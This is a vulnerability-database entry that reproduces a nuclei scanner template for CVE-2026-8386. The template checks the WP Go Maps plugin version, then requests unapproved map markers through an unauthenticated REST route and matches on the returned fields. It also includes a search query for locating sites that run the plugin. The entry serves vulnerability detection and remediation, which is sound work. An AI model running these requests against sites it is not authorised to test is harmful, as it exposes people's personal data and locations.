Lucene search
+L

WP Go Maps < 10.0.10 - Unauthenticated Marker Information Disclosure

🗓️ 16 Jul 2026 09:56:22Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

WP Go Maps WordPress plugin

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
CVE-2026-8386
15 Jun 202611:52
circl
cve
CVE-2026-8386
15 Jun 202606:00
cve
cvelist
CVE-2026-8386 WP Go Maps < 10.0.10 - Unauthenticated Sensitive Information Disclosure via Marker ID
15 Jun 202606:00
cvelist
euvd
EUVD-2026-36698
15 Jun 202606:00
euvd
nvd
CVE-2026-8386
15 Jun 202608:16
nvd
ptsecurity
PT-2026-49184
15 Jun 202600:00
ptsecurity
vulnrichment
CVE-2026-8386 WP Go Maps < 10.0.10 - Unauthenticated Sensitive Information Disclosure via Marker ID
15 Jun 202606:00
vulnrichment
id: CVE-2026-8386

info:
  name: WP Go Maps < 10.0.10 - Unauthenticated Marker Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
   WP Go Maps WordPress plugin <10.0.10 contains an information disclosure vulnerability caused by lack of approval-state filtering on the public single-marker REST endpoint, letting unauthenticated users access unapproved marker records including PII and geographic coordinates, exploit requires no authentication.
  impact: |
    Unauthenticated users can access sensitive unapproved marker data including PII and location coordinates.
  remediation: |
    Upgrade to version 10.0.10 or later.
  reference:
    - https://wpscan.com/vulnerability/fa7f5cb0-abe2-4079-9290-e0e4dc89f27f/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8386
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8386
    cwe-id: CWE-862
  metadata:
    verified: false
    max-request: 4
    fofa-query: body="/wp-content/plugins/wp-google-maps/"
    tags: cve,cve2026,wordpress,wp-plugin,wp-google-maps,disclosure,unauth,rest-api

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WP Go Maps") || contains(body, "WP Google Maps")'
          - 'compare_versions(lsversion, ">=1.0.0", "<=10.0.9")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        internal: true
        group: 1
        regex:
          - 'Stable tag: ([\d.]+)'

  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers/1/"
      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers/2/"
      - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers/3/"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "approved", "lat", "lng", "map_id")'
        condition: and
# digest: 4a0a00473045022008fe601dd32983f4ff449d2556b4e063b8ae56c6ee32631d68a473b0599af21302210096fd8ec19b36ef579f6fb6628dfb258839538f009b3513bd2413731a09d68e65:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jul 2026 06:59Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3
EPSS0.00225
SSVC
3